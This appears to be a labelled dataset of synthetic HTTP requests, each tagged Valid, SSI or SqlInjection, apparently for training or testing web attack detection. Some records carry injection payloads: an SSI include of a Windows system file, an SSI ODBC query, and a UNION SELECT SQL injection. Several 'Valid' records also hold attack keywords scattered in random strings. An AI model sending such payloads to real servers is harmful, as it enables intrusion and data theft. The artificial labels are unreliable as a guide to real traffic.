Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Feb 08 15:51:32 UTC
Last-Modified: Thu, 08 Jul 04 09:52:59 UTC
Host: 41.69.248.163
Connection: close
Accept: video/mpeg, image/jpeg;q=0.3
Accept-Charset: *
Accept-Encoding: compress;q=0.5, deflate;q=0.8, deflate
Accept-Language: e-Okd, xNEqxe-d0, iod4-er;q=0.8
Cache-Control: only-if-cached
Client-ip: 175.50.139.76
Cookie: w7qNDlach4=e9mhst;ssdfDvhnei=vbscriptahnPutsmt]0dos
Cookie2: $Version="051"
Date: Fri, 31 Oct 08 13:10:10 CET
ETag: "I_-yW92HFKbHxitO0Z"
Expect: 100-continue
From: rQkb4al@ootSiafmsu.cz
If-Modified-Since: Thu, 12 Jan 06 15:30:47 CET
If-Unmodified-Since: Mon, 20 Apr 09 04:05:49 CET
If-Match: *
If-None-Match: "BRtxEF-enUhWzSKxGDlH"
If-Range: Thu, 04 Jun 09 22:58:57 CET
Max-Forwards: 0
MIME-Version: 6.8
Pragma: Die='6to'
Proxy-Authorization: datl 7ziWgict=Jnpued
Authorization: Basic ekRpYTpuaGNwY3J4cw==
Range: 2-71,25-834520
Referer: /ziTq/Aeste/0teo7/Ltrfeel/teEo.css
TE: chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/6.3 (X11; U; Linux i386 2.6; ic-sf; rv:6.5.7) Gecko/24377036
UA-CPU: StrongARM
UA-OS: Linux
UA-Color: color16
UA-Pixels: 808x844
Via: 2.4 www.nhAr8.shtml:82, 0.7 230.39.50.108, 3.9 www.ior8ds.gif
Transfer-Encoding: gzip
Upgrade: ufb/8.5, d45i3/7.9
Warning: 717 108.5.228.232 "euhD8Tr" 
X-Forwarded-For: 55.196.49.158
X-Serial-Number: 752812254452033186
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~

dot0ih=\P&divmGNm=havings&V.XFkuS=<!--#include     virtual="c:\winnt\system.ini"-->&tnsc=9859&ikekhSl=td2i

End - Id: 40416
Start - Id: 9110
class: Valid
GET /XL0T8pahaHLKD/v-wbCM13yIlXGA4dI/hMo0@Ot1YZh9E4A2RjAI/dXdJWcB1YW6k.cgi?orra10nas=jtelIree5e9s0nTsea&9lesaiiqe=4457742073&aluaga9l=45016&anOStsrT1n=goh&zobjectW3IDW6boot.iniw=dyopen4%24lopt5hend%29ce&1snoin=CnhDlfwncmdwinntn&ltdmneL=k+a%25L+hiedoe&nljeiyRo=n1l&86toEq=382&tsioc=4osbweezDrue&lpFA=8oeaq+tfcrnes&7bxodhuhfur=ohttpa%2B+&tnsifwaxe=zr+rcp&WKRJX=pho&tDbiajkid=ae HTTP/1.1
Host: 15.106.173.25
Connection: keep-alive
Accept: audio/x-wav;q=0.0, image/*, video/mpeg
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.6, identity, gzip
Accept-Language: *
Cache-Control: max-stale
Client-ip: 23.64.59.93
Cookie: diilqDp7w=ri iaecn0% uoptrn;nsatAa=Eonsol<feznetches;DswJWhLlikedelete=3853293;ie=iePoSU+;e
Cookie2: $Version="40"
Date: Wed, 28 Nov 07 06:13:25 UTC
ETag: "V6QvKH2naWZH6U2b"
Expect: 100-continue
From: eo0inrr@xinaejal.fr
If-Modified-Since: Thu, 21 Feb 08 13:02:42 UTC
If-Unmodified-Since: Thu, 03 Dec 09 23:25:20 GMT
If-Match: "tLohMTnFbKJ8jbvEmqv"
If-None-Match: "qFgnLa.iO8B0mNncaSw"
If-Range: Mon, 09 Nov 09 02:30:27 UTC
Max-Forwards: 5265
MIME-Version: 9.1
Pragma: e5=a3H
Proxy-Authorization: arcr arreu=axeMtee1
Authorization: Basic cmw0YnJ5dHQ6cmVkc3JNeg==
Range: 209468-,-773443,52-920348
Referer: /Nhde2is7/xnnT/LeetArh.css
TE: gzip,gzip,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.3 (Windows; U; WinNT 4.7; sG-it; rv:5.6.8) Gecko/10405785
UA-CPU: StrongARM
UA-Disp: 6130,9479,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 9463x953
Via: eoe/5.5 www.pefisp.tiff, 5.8 www.retmRdk4.gif
Transfer-Encoding: gzip
Upgrade: nAzm/6.2, yh8o/8.1
Warning: 284 243.236.131.97 "ecoowdcc2ipb" "Fri, 03 Apr 09 17:35:41 CET"
X-Forwarded-For: 44.108.222.96
X-Serial-Number: 817497
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9110
Start - Id: 17158
class: Valid
GET /mAQ/CItaiM4eoidpn/dtsrforu9qt0iNh/asnequsbens/aX_hoU0/tV3jUkh/lxxLPvFlpL-ZQuGhooc/RQ/Iysj.php4?oI=bca%3Ai9amt&eivxsefoG=259 HTTP/1.1
Host: 172.207.125.52
Connection: reffc6tc
Accept: audio/x-wav;q=0.0, video/*;q=0.5, text/*
Accept-Charset: iso-2022-jp
Accept-Encoding: *;q=0.9
Accept-Language: b-eprt;q=0.4
Cache-Control: e='It'
Client-ip: 193.42.5.207
Cookie: yo1i= eswetlinkrEb;onsehfg=oY 'systemshyumtes;Av7eA7tlitls=w ginput
Cookie2: $Version="3"
Date: Sun, 20 Dec 09 10:37:33 UTC
ETag: W/"fC2iwVqebiOk3RGH"
Expect: co46Lyu5
From: gcEsmc@smae.st
If-Modified-Since: Fri, 09 Jan 09 22:19:36 UTC
If-Unmodified-Since: Thu, 21 Apr 05 06:58:00 GMT
If-Match: "@lxq3@PuJVsFNiV5jp"
If-None-Match: "FBUwaohQJ1Ier._Ce"
If-Range: Wed, 28 Jul 04 02:32:00 GMT
Max-Forwards: 3
MIME-Version: 3.2
Pragma: d=irNtsea
Proxy-Authorization: NTLM ZWw1YzF0U1RkcmVlWnB5aGhpbzJOZXdQbGlkU29ucm9s
Authorization: iis40p ltrk2=itoiems
Range: 390931-971113
Referer: http://5een.com/i9prn/mecedsfr/R5ejeo.bin
TE: gzip;q=0.9
Trailer: Accept-Encoding
User-Agent: gc2paOera/3.9
UA-CPU: StrongARM
UA-Disp: 182,819,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0887x1006
Via: HTTP/2.3 132.160.123.56, 2.2 www.aAsiiM.png:286, hIDt/2.0 116.103.231.116
Transfer-Encoding: deflate
Upgrade: wbigqt/6.4, hv08se/7.5, ses/3.0, iei/9.4, n6vl/4.7
Warning: 696 226.137.21.239 "teancE6uh" 
X-Forwarded-For: 181.160.254.196
X-Serial-Number: 92445
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17158
Start - Id: 40812
class: SSI
GET /bcWaOpoqae/eshocV7/XTR2BBj/riGelmnhVtttro/iA-DfuQ4nknNL/ss/fromW7ZNGHiTrAT2ul/W4EZwrw/s5LsMK.OUdb@Ibpgh/lFDYCk7/eCKBiJ/ztken4rei.htm?yehugmaasns99t=dereh&ib=2Peeq&bgsoundQh153lI=%3C%21--%23odbc++++statement++++%3D++++%22select+++neko5%2C+rt%2C++idmh+++++from++++geerhwiHk++order++++by++++1%2C+++++29%2C+++++8%22+--%3E&r7onrlexma=uoetNdhjlece HTTP/1.0
Host: 230.1.165.72:8142
Connection: close
Accept: */*
Accept-Charset: iso-8859-6;q=0.9, x-mac-icelandic;q=0.6, windows-1251, windows-1251;q=0.3, koi8-r
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: max-age=60391
Client-ip: 89.161.138.91
Cookie: ecetaetpgS6=etmpnM;ihreurtfiesoc=5vbscriptgeecho~mamat;SRsk=a4naTl40atv passthru;khtje3em6FszzN8=otu0aNae;zysd=hxa4tutrea
Cookie2: $Version="210"
Date: Tue, 15 Feb 05 20:10:17 CET
ETag: "V0yqNhaPfiAfr9wMm2IH"
Expect: 100-continue
From: iiljwdi@httr81j.de
If-Modified-Since: Wed, 18 Jan 06 11:58:44 GMT
If-Unmodified-Since: Mon, 27 Aug 07 06:24:13 GMT
If-Match: ".ghuRfE_DK4TffeKu4-n"
If-None-Match: *
If-Range: "Jz@uU_i@G5wY0Wp"
Max-Forwards: 987
MIME-Version: 3.0
Pragma: ektelqv='eana'
Proxy-Authorization: Digest opaque="9des"
Authorization: NTLM bW9haTl0Y2d0eWl1aHphRWMwYnlyRWFsYWdhSGFpbWZobWFv
Range: -4,-190,-803524
Referer: /Aoite/e9SCzt/hsaYRih.php4
TE: gzip,trailers,chunked;q=0.6
Trailer: Range
User-Agent: Mozilla/9.7 (Machintosh; U; PPC 2.1; ie-Sa; rv:3.2.8) Gecko/27725089
UA-CPU: StrongARM
UA-Disp: 327,318,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 871x928
Via: 7.1 www.v5steer.jpg
Transfer-Encoding: eneaao; tdqip=erSa
Upgrade: osd5g/7.7, cplms/1.4, dtwnv0/2.5, h9zg/0.0
Warning: 985 www.atEa.jpg:824 "esoj" "Tue, 11 Nov 08 09:01:56 UTC"
X-Serial-Number: 17196143235816087076
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40812
Start - Id: 41602
class: SqlInjection
GET /en.@ws/W9knDc/nGditllgMe9mlatnf/kstdinOKV/o0ehosan/eeLee5iKsot/GIXFG@glAsG.mdb?nr1iiai=1Unsinoiegzof&2sd1ntrxnsgu7=%27%29+UNION+ALL+++SELECT++++ysmt3mol++%2C+++tn+%2C++loeasn++FROM+++etnihboEe++++WHERE++ebga+++NOT+IN++%28+%27h7ulm%27+++%29++++AND++p0E+++NOT+++++IN+++%28++%27Jre%27+%29++++AND+%27%27++%3D++%27&retTce=slgfup-ci0 HTTP/1.0
Host: 85.233.32.77
Connection: close
Accept: audio/*
Accept-Charset: x-mac-arabic, iso-2022-kr;q=0.2, us-ascii, x-mac-turkish;q=0.7
Accept-Encoding: 
Accept-Language: SaotHoco-cstnaetm, Esrgo-tsn;q=0.5, r-hbnes;q=0.8, qase7ne-hi, 4-lwU8ef;q=0.3
Cache-Control: max-age=08
Client-ip: 66.83.180.190
Cookie: llsytr4ae=484140298
Cookie2: $Version="7"
Date: Mon, 28 May 07 16:31:14 CET
ETag: W/"javWwvhnc36ZMUY-15lG"
Expect: 100-continue
From: eimuyt@enr2so.ch
If-Modified-Since: Fri, 02 Nov 07 15:38:46 UTC
If-Unmodified-Since: Fri, 27 May 05 21:05:27 UTC
If-Match: "D5yB_91ZKfigvC9u"
If-None-Match: "H3z-6TTwNx-g5OH"
If-Range: "egzvQJG3T5@HMmK"
Max-Forwards: 4
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: mntre es5jmh0t=sta8dmeb
Authorization: Basic dGFhZWk6ZmZxTGF5Zg==
Range: 9034-
Referer: /Nlinc.aspx
TE: trailers,deflate
Trailer: Referer
User-Agent: ajshjed/3.3
UA-CPU: MIPS
UA-Disp: 5571,966,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4149x276
Via: 6.0 www.ro3ha6g.png
Transfer-Encoding: compress
Upgrade: w6of/9.8
Warning: 546 www.haslz.jpeg "O9dygy07fAaes" "Tue, 03 Jan 06 08:40:36 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41602
Start - Id: 15836
class: Valid
GET /7s0e/xhtuahbgtaux8eibge/hT@m4@P3Y/5UW.Uw/i6/iTsScanJerli3RdH4no/hmj/eaHdyIydFlaqsdeunD/idnu.js?o7Iiea=tehcZ&fum3uT_BEDC=ageR11da&8qpsxpghdniAe=+cfp%26&i4oywpi=n&tuRxbodyYOI_vd=yB5&CezLX=no&auoamst=d%3F&rGEGk4lN=7373182947 HTTP/1.1
Host: 119.130.197.50
Connection: close
Accept: video/*, audio/*
Accept-Charset: x-mac-cyrillic
Accept-Encoding: gzip, identity
Accept-Language: 2ou-sb1nd
Cache-Control: min-fresh=7650
Client-ip: 52.196.223.138
Cookie: uojm=24;ws4lu6yl0noEmig=ss ojaRnunm;bgmfdiiTaffn=dh4;loo=yboot.iniueRltytd
Cookie2: $Version="4"
Date: Mon, 12 Apr 10 05:14:29 GMT
ETag: "wcGSmyieuY9S4sQ-"
Expect: 100-continue
From: ciaes@3cRcrame2.ch
If-Modified-Since: Fri, 22 Feb 08 11:40:05 UTC
If-Unmodified-Since: Fri, 02 Apr 04 09:53:25 CET
If-Match: "_5UsmAaZ-zL7HXHKm"
If-None-Match: "crWt_nByAh3_vV4s3"
If-Range: Sat, 01 Mar 08 19:46:17 UTC
Max-Forwards: 1081
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Digest username="tnelie"
Authorization: Basic MVJoaTY6dGlzc2RpaQ==
Range: -630,9-,363-
Referer: /aortidei/vwcai.mpg
TE: trailers,deflate,deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.8 (Windows; U; Win98 4.4; ae-ti; rv:9.5.8) Gecko/78810129
UA-CPU: 68000
UA-Disp: 3222,4414,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 265x821
Via: 7.4 www.haAvozae.gif
Transfer-Encoding: compress
Upgrade: hEt/8.8, eostr/1.6, ih5Ss/6.3
Warning: 734 www.a4hol.gif "8eiyls3tra8i3ro" "Sun, 10 Sep 06 06:04:47 CET"
X-Forwarded-For: 157.1.233.188
X-Serial-Number: 6066558353005235
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 15836
Start - Id: 18960
class: Valid
GET /ilr5cp9s7cfhD/rxfes0ustrTC/pIn2xVnycExDD/Coee6wt/alRUHdfPhG-g2d/i8GOModsc8P/hnullO_nOlVSdpV/ieloklc883egurns6/sF/ts-__GvfaymnmcIJ8xvO/iG/Oud6EK.msf?cneyh=s%5CNt&esSarse6hdnE=o6xl5a&iog8soeAii=s&sl6e=tueuiA&cat5.@jC=bZog.x&q9CR8vhaving=yobgsoundsbody&oMeadsrnnis=n9styledh&siLehouglh=s&iootintqarwagh=%25smtgiframesC6&p6su5eTTugsc=o0&oziI1XV7hR2update=er18Pq_P1mk HTTP/1.1
Host: www.toaht82ti.it
Connection: close
Accept: application/zip;q=0.8, audio/*, video/*;q=0.9
Accept-Charset: *;q=0.6
Accept-Encoding: compress;q=0.4, identity;q=0.0, gzip;q=0.1, deflate, identity
Accept-Language: soe7eisv-outanms
Cache-Control: no-store
Client-ip: 79.237.56.253
Cookie: hdk1oTknI1=d6eo8eie;eSwaec=iTCnrot7ue;la1dltNeorpntr=aXg1A7tgQt3;nade9en=|xvItor;tdfe=bit;vtpuuw=h8Rett
Cookie2: $Version="358"
Date: Sat, 06 Nov 04 14:05:07 GMT
ETag: "R.jMxP8GeCxAaao"
Expect: 100-continue
From: yhhrcnd@rmltnrr.ch
If-Modified-Since: Thu, 09 Oct 08 12:21:29 UTC
If-Unmodified-Since: Mon, 12 Oct 09 19:18:01 GMT
If-Match: "EGLJCsHgKHHth7@avH"
If-None-Match: *
If-Range: Tue, 15 Aug 06 21:58:25 GMT
Max-Forwards: 0505
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM a1RjaG9ib2pudDZvdGpDUjRhYWl4cnBpZWVydGtlc3Uz
Authorization: deni BgeCdtco=owltyT
Range: -955518,84-,42-
Referer: http://www.towes6d.fr/lhua/NvshenIn/amhpmu.mspx
TE: trailers,deflate;q=0.2,chunked;q=0.9
Trailer: Authorization
User-Agent: tRteor9a/2.6.4.4
UA-CPU: 68000
UA-Disp: 2989,0086,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2163x0680
Via: 9.3 203.179.99.122, 5.6 38.163.19.208, 7.5 200.80.28.91
Transfer-Encoding: deflate
Upgrade: Oeosl/8.2, rovdy/3.4, Ipu/2.0
Warning: 274 103.50.6.94 "Nnxruknc1" "Wed, 14 Dec 05 19:16:26 UTC"
X-Forwarded-For: 166.105.2.220
X-Serial-Number: 27260320301
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18960
Start - Id: 2851
class: Valid
GET /bcDe2t/thlnfYoot/euDukiientnnbfcgg/oX1v1dI1g/hvIyNYM3O/1naf%urplinkwbW/n.5BKZ/uil/4arst7rdiqu0ditiuntL/uXzpAWmmfWE2Oz5Fgc/linkw4RMstdin4HCJuXNB.mdb?rtyp6njcm=453&OaLadLdQgfyG=xmochait&IRselj=ipndiS&PYsb=wFr&oaiShn=6&rAeicnoxRogt=245927&th2A9=at7n&tbpgcter=nhe HTTP/1.0
Host: 94.160.2.190
Connection: txAutwH
Accept: audio/*;q=0.1, video/quicktime;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: e-3at;q=0.4, Atcoor-8
Cache-Control: max-stale=9485
Client-ip: 82.194.135.99
Cookie: herMtszinFyasls=dllng0oemt;mo4=xmaG.;hndsxboonex=documentfo4 t@ocqpeef
Cookie2: $Version="975"
Date: Thu, 05 Feb 09 03:08:11 UTC
ETag: "NjhsqOtV49g9a9O"
Expect: 100-continue
From: ontooib@ikmeqssL5.gov
If-Modified-Since: Fri, 09 May 08 15:13:02 GMT
If-Unmodified-Since: Mon, 14 Sep 09 21:51:54 UTC
If-Match: "nxwtUGsSpRSktgBUK"
If-None-Match: "oMyxy-_HJ0y.OrxR_k"
If-Range: Tue, 23 Sep 08 11:57:18 GMT
Max-Forwards: 3211
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Basic bmFtYWg6NXMyYXY=
Authorization: i3tdd Iohw=v0bepdp
Range: -697726
Referer: http://www.sei7sfs.fr/6Tlxdsr1.pdf
TE: trailers
Trailer: TE
User-Agent: a_IZTScqC http://www.cnnne.cz
UA-CPU: Sparc
UA-Disp: 9780,426,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7338x2329
Via: 3.7 www.cbnamct.tiff, O9teot/8.9 www.1Raee.css:4734
Transfer-Encoding: gzip
Upgrade: dp5e/7.1, 6Wocs/8.4, sytonn/2.0, a4edeH/0.9
Warning: 042 www.cos617.shtml "on6et" "Wed, 08 Mar 06 04:43:54 UTC"
X-Forwarded-For: 205.119.197.218
X-Serial-Number: 674535146316
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2851
Start - Id: 28964
class: Valid
GET /d2W1YvoRrMjmz26jO.Z/box8nondscenh4ih/OYqQWFSPLldelete/wclEed/7hfsmsyettqAn2ihy3hm/cvIw-n5n@x49uvT4V3/el2hhaE/rdrGrs.png?sf0t=rfiadmiiarnarmh&mdyveoapl=a%3AsreGn&wE4=hoee&qpsbT=auwb&0oomaseunEeu=to&wjL0Zos=1&lge9=18851155 HTTP/1.1
Host: 17.128.126.218
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: serha-hia;q=0.9, teola0I-wnw9s, hee-2tphoao;q=0.6, phnwao0-rte;q=0.9, djtal-heI;q=0.1
Cache-Control: no-cache
Client-ip: 78.125.221.48
Cookie: tTmhlnUe3tsSQ=oNi6zeh1tl8
Cookie2: $Version="30"
Date: Sat, 06 Mar 10 14:27:41 CET
ETag: "AlH_ZvVv78c5KA9P@U"
Expect: rskuty=telqu7e
From: h5hrlh@Esuhia1.cz
If-Modified-Since: Fri, 30 Jul 04 09:47:07 CET
If-Unmodified-Since: Tue, 07 Aug 07 13:31:31 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 13 Sep 06 06:47:53 UTC
Max-Forwards: 665
MIME-Version: 4.5
Pragma: euAnee8='btsc'
Proxy-Authorization: Digest qop=auth
Authorization: praomc eFi7othH=broeRu
Range: -332385,-432,1995-63
Referer: http://www.eNe7batb.ch/enOnTke/n5sioxo/hqlab/TFwiLs6b/nhbli.asmx
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.7 (X11; U; Open BSD i386 4.1; zh-Er; rv:6.2.3) Gecko/37463901
UA-CPU: Sparc
UA-Disp: 3550,9047,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1053x1221
Via: 3.8 www.dqant.tiff
Transfer-Encoding: compress
Upgrade: SDtt/0.6, mnhrp/9.3, edgePn/8.1
Warning: 060 221.176.165.132 "oh3respRbbacere" "Fri, 16 Mar 07 05:27:50 UTC"
X-Forwarded-For: 108.24.111.61
X-Serial-Number: 055751373307057
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 28964
Start - Id: 14977
class: Valid
GET /hf4l/sm1aC/Ae3/ndFHJNJU/rdnstneSiora0/hioht/cjZCC.html?Si=855968&vaahaxTmcosafum=gOewz&7lno=l.ahk&5Na3eexdofsih=NIe&Itdntlfetogo=4738&vrafSuie=6&stdxlqSo=n1%2Fuds&eini=ensahgystt&mrecoiens5=pe-t&NJ5tTR1bKDwinnt=a&ssrh=etcdmpchildh0 HTTP/1.0
Host: 56.102.186.213
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: x-mac-arabic;q=0.5, iso-8859-8;q=0.3, iso-10646-ucs-2;q=0.5, ks_c_5601-1987;q=0.4, iso-8859-15
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 194.65.185.167
Cookie: Ei3eheam=121;YilsC=neu taGrmIpasswd%ori(;7zWIpw7q=zk@xa|ht
Cookie2: $Version="57"
Date: Sat, 03 May 08 16:49:45 CET
ETag: W/"71JFW4MzbqhzQImwhpT"
Expect: 100-continue
From: mrepe@2e6fkf.net
If-Modified-Since: Sat, 19 Jun 04 01:27:08 UTC
If-Unmodified-Since: Wed, 05 Sep 07 06:13:50 UTC
If-Match: "HuJDfiRaJCWZZBY_"
If-None-Match: *
If-Range: Fri, 10 Jun 05 03:21:33 CET
Max-Forwards: 6603
MIME-Version: 3.1
Pragma: hoa='e'
Proxy-Authorization: NTLM dWV2ZWVpM0xndGxFYWVhYWhsZ3J3YWUxcmJ0cXNmdGE3anBybm05cnlldzFh
Authorization: Digest cnonce="rnAhmoaa"
Range: 1538-,-4818
Referer: /aciri/pr9reoih/c64ij.pl
TE: trailers,trailers
Trailer: Range
User-Agent: Mozilla/3.8 (Machintosh; U; PPC Mac OS X 5.2; se-sb; rv:6.9.6) Gecko/51049684
UA-CPU: PowerPC
UA-Disp: 182,0767,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3303x2790
Via: loq/2.3 www.e1tm.tiff
Transfer-Encoding: identity
Upgrade: ko8io/4.9, f9naL/9.3, mmnnf/4.7, sgSaoe/8.1, 7na6/9.3
Warning: 058 66.139.140.245 "temrthaopc3v" "Tue, 05 Dec 06 10:50:29 GMT"
X-Forwarded-For: 217.55.216.75
X-Serial-Number: 158686381572781
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 14977
Start - Id: 25594
class: Valid
GET /lcnrghs/vbscripteO5GdX1Zjq/ficliohir3nue8ru/f5xIavy/a2TYoH_8BlX/ligMer5sldjhmw/dkldp8d4kdsta7bka2i/nihhhNS2/usuaLehoisrcnh4En/dEiaHrane.swf?ar=r%3AW&85wnwneru=0tomnrca02a&IeueaA=smM&Re6NB=ie1%3C&0820dtN=9ge%29i3per0%28nf&cv8hO=6e8p6sei2a4da9&h.RMX@68kh5L=253 HTTP/1.1
Host: 150.98.11.44:80
Connection: sRhnes
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: ea-Datysti;q=0.3, Emvw7FAi-tod0a7i;q=0.1
Cache-Control: max-stale
Client-ip: 254.210.233.20
Cookie: ctwrj=Etdhe 0e(ywp-Itmpon35;Qlog-Hf=drml-ovv7 f5hbn:i;ytIUwolms5m=48037
Cookie2: $Version="532"
Date: Wed, 13 Sep 06 21:56:30 CET
ETag: W/"9@oQvDCTqM5ACszfVN"
Expect: 8hyoni4e=ehnweh
From: camaabz@oEUygi.cz
If-Modified-Since: Sun, 22 Feb 09 21:43:33 CET
If-Unmodified-Since: Tue, 06 Nov 07 13:48:33 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 03 Jan 09 18:37:36 UTC
Max-Forwards: 1
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: NTLM bmplYW5kMmVvaHNvb3NlZjdxdDRlZWl3Y3VkYWpha2ZiaHRzaWVUaWV5
Authorization: Digest cnonce="lat7"
Range: 286-,8185-
Referer: /67hrctnS/thht/tt2metue.asmx
TE: chunked,deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/6.3 (Windows; U; Windows NT 5.0; st-TE; rv:3.8.5) Gecko/13983353
UA-CPU: Sparc
UA-Disp: 8439,526,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 290x491
Via: 4.9 www.nnnleo2.htm
Transfer-Encoding: ordtd
Upgrade: ohwH/4.5
Warning: 089 33.136.50.173 "slomeeEwemt2tyii4es" 
X-Forwarded-For: 255.93.182.143
X-Serial-Number: 10779920705093
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25594
Start - Id: 964
class: Valid
GET /u0AoAQC6ss9/eT.htm?nescrfCrUhaa=60tnode&rMgazllyiwtc1v=040&tlrtwprn=308&tohs=%3Eta%3ArPa%243d&NgRmzvtojBn2=qneyrdlaon8mafv&1isrd5im=a&4https9Isock_streamm3nperl9=oUVvh&3t6srtne=rnntE2tteNvSni&leoeRiekntheto=516178&AtfooiOTtbte=455&jn5vr=%7Ci%3AtiPwua%7Emdwq&fl8nhh4Aee=74 HTTP/1.0
Host: www.7iuubojtc.org:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: iso-8859-3;q=0.1, ks_c_5601-1987;q=0.0, x-mac-hebrew;q=0.8, big5;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: bR='eca6'
Client-ip: 82.195.65.170
Cookie: t3ishsoe=29;oPdNfoY03hh0afa=7;qio=1
Cookie2: $Version="446"
Date: Sun, 03 Jul 05 23:17:52 UTC
ETag: "fq1Z02PL5UAwOQk.rNn"
Expect: 100-continue
From: drgltVi@44huhi.be
If-Modified-Since: Sun, 23 Sep 07 20:53:43 GMT
If-Unmodified-Since: Sun, 04 Mar 07 08:48:06 CET
If-Match: ".oCQEXzek@vQRAgsy1"
If-None-Match: *
If-Range: Sun, 06 Jun 04 22:57:02 CET
Max-Forwards: 3868
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic c3plbmw6dHl6VHJn
Range: 93711-32096
Referer: /nixBih0.avi
TE: trailers
Trailer: Connection
User-Agent: Mozilla/0.6 (X11; U; Solaris 4.0; Ft-nh; rv:7.1.2) Gecko/01547916
UA-CPU: 68000
UA-Disp: 710,919,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7955x0041
Via: 8.4 www.ohixde.html:6198, 7exw/7.0 www.abseysrn.shtml
Transfer-Encoding: gzip
Upgrade: speh/3.3, Eai/0.1, hYun/9.4, uabeh/7.5, 8re3/1.6
Warning: 722 37.71.188.90 "iftrtm47sdah" "Fri, 17 Jul 09 01:24:55 UTC"
X-Forwarded-For: 18.21.214.141
X-Serial-Number: 5433664
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 964
Start - Id: 21696
class: Valid
GET /Hhaabtb7Ee/arU/4enljnuea0r.mdb?onjCwitres7lopm=taeVn&fwodaao0dh68gg=793034645&hUi=41&h2Tbelald=9411285&tyeoetiesn=i HTTP/1.0
Host: www.ezSrTddeE.net
Connection: close
Accept: image/jpeg;q=0.6
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: nlhco='ystetr'
Client-ip: 19.23.184.246
Cookie: nfZJAS=ugAaN3iBha7ZlmiM;bc=aeeo>c8htacces;fe9slN1ah0=8336207675;c6tnI5besoi=?o5
Cookie2: $Version="9"
Date: Wed, 12 May 04 13:28:03 GMT
ETag: "sD5DT9hbkp6_Id0xi"
Expect: aoSe=shro;Anls43no=Tmghoa
From: fhnah0@pcVodthnoa.com
If-Modified-Since: Sat, 05 Nov 05 02:06:27 UTC
If-Unmodified-Since: Mon, 25 Jan 10 02:25:40 CET
If-Match: "@slnfGhoht-bB.966r"
If-None-Match: *
If-Range: *
Max-Forwards: 99
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: zlkAcr cnfcci=ifhphtEe
Authorization: Basic bmxsb286bmd5cmRvbzg=
Range: 6854-805189,4305-14775
Referer: http://www.yeota.gov/D7oHso/iw7euErs.html
TE: gzip
Trailer: Via
User-Agent: Mozilla/8.7 (Machintosh; U; Mac OS X 4.7; eR-no; rv:8.4.7) Gecko/03149417
UA-CPU: StrongARM
UA-Disp: 299,773,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 664x378
Via: 1.9 167.17.97.162, sSuQ6n/9.0 www.8lqaD.gif
Transfer-Encoding: tnle; a6tla=itasaaj
Upgrade: Abae/9.2, 23ehie/8.6, esDl/9.5, y7tfvd/4.7, aiC/7.6
Warning: 456 16.111.210.179 "htasayeJyno" "Fri, 12 Nov 04 12:32:53 CET"
X-Forwarded-For: 36.156.86.13
X-Serial-Number: 07885
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21696
Start - Id: 13771
class: Valid
